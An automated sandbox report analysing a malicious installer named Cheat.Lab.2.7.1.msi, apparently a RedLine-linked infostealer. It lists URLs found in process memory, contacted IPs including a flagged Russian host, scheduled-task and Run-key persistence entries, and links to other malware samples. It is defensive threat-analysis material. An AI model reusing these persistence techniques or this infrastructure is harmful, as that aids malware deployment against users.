                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Contract/MSValue3Responseconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002926000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • 2%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issueconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issueconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.advancedinstaller.comCheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trustconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Nonceconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Contract/MSValue2ResponseDconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • 2%, Virustotal, Browse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Renewconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://ocsp.sectigo.com0connect.exe.9.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2006/02/addressingidentityconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/soap/envelope/connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://tempuri.org/Contract/MSValue1connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • 1%, Virustotal, Browse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=connect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/Contract/MSValue2connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • 4%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#connect.exe.9.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://tempuri.org/Contract/MSValue3connect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2401674752.0000000002916000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • 1%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://duckduckgo.com/chrome_newtabSconnect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/Dconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • 1%, Virustotal, Browse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/06/addressingexconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoorconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonceconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renewconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKeyconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchconnect.exe, 00000016.00000002.2403851967.0000000004246000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000412C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.000000000437C000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041D5000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004360000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004409000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004262000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2403851967.0000000004147000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.w3.oconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Committedconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/faultconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponseconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Cancelconnect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://sectigo.com/CPS0connect.exe.9.drfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementconnect.exe, 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                              		ip-api.comUnited States
                                                                                                                                                                                              		53334TUT-ASUSfalse
                                                                                                                                                                                              162.159.129.233
                                                                                                                                                                                              		cdn.discordapp.comUnited States
                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              91.103.252.8
                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                              		202306HOSTGLOBALPLUS-ASRUtrue
                                                                                                                                                                                              193.37.71.112
                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                              		202723VAD-SRL-AS1MDfalse

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                                                                              Analysis ID:1337011
                                                                                                                                                                                              Start date and time:2023-11-04 01:34:13 +01:00
                                                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 10m 58s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:25
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample file name:Cheat.Lab.2.7.1.msi
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal76.troj.spyw.evad.winMSI@30/48@2/4
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                                                              • Number of executed functions: 93
                                                                                                                                                                                              • Number of non-executed functions: 279
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .msi

                                                                                                                                                                                              Warnings

                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.33.181.181
                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              00:35:12Task SchedulerRun new task: CheatLabTask path: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe s>"C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                                                                                                                                                                                              00:35:22Task SchedulerRun new task: ServerUpdate_NzEx path: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe s>C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
                                                                                                                                                                                              00:35:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                                                                                                                                                                                              00:35:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                                                                                                                                                                                              01:35:11API Interceptor12x Sleep call for process: powershell.exe modified
                                                                                                                                                                                              01:36:10API Interceptor37x Sleep call for process: connect.exe modified
                                                                                                                                                                                              01:36:34API Interceptor182x Sleep call for process: LuaJIT.exe modified

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              208.95.112.1Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=query,status,countryCode,city,timezone
                                                                                                                                                                                              HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                                                              • ip-api.com/json
                                                                                                                                                                                              HEUR-Backdoor.MSIL.LightStone.gen-e0fa9c62364.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                              10.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              bQXD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              proof_of_payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              New_Order_(2).jsGet hashmaliciousPXRECVOWEIWOEI Stealer, zgRATBrowse
                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                              ify.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                              lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=11827
                                                                                                                                                                                              lK3sh4b3ds.exeGet hashmaliciousAgniane StealerBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=11827
                                                                                                                                                                                              gsges.exeGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              Final_rooming_list.batGet hashmaliciousBlackshades, QuasarBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              RC7.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                              • ip-api.com/json/?fields=225545
                                                                                                                                                                                              #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                              Quotation.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              Tax-Returns-Of-R58-765.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                              • ip-api.com/json/
                                                                                                                                                                                              DRMS_Tender_No._P500-2023-102.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                                                              • ip-api.com/json/

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              cdn.discordapp.comCheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.134.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.130.233
                                                                                                                                                                                              Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 162.159.133.233
                                                                                                                                                                                              Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.129.233
                                                                                                                                                                                              Uuxcibejso.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 162.159.134.233
                                                                                                                                                                                              VakifBankKrediKartiHesapOzeti.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • 162.159.130.233
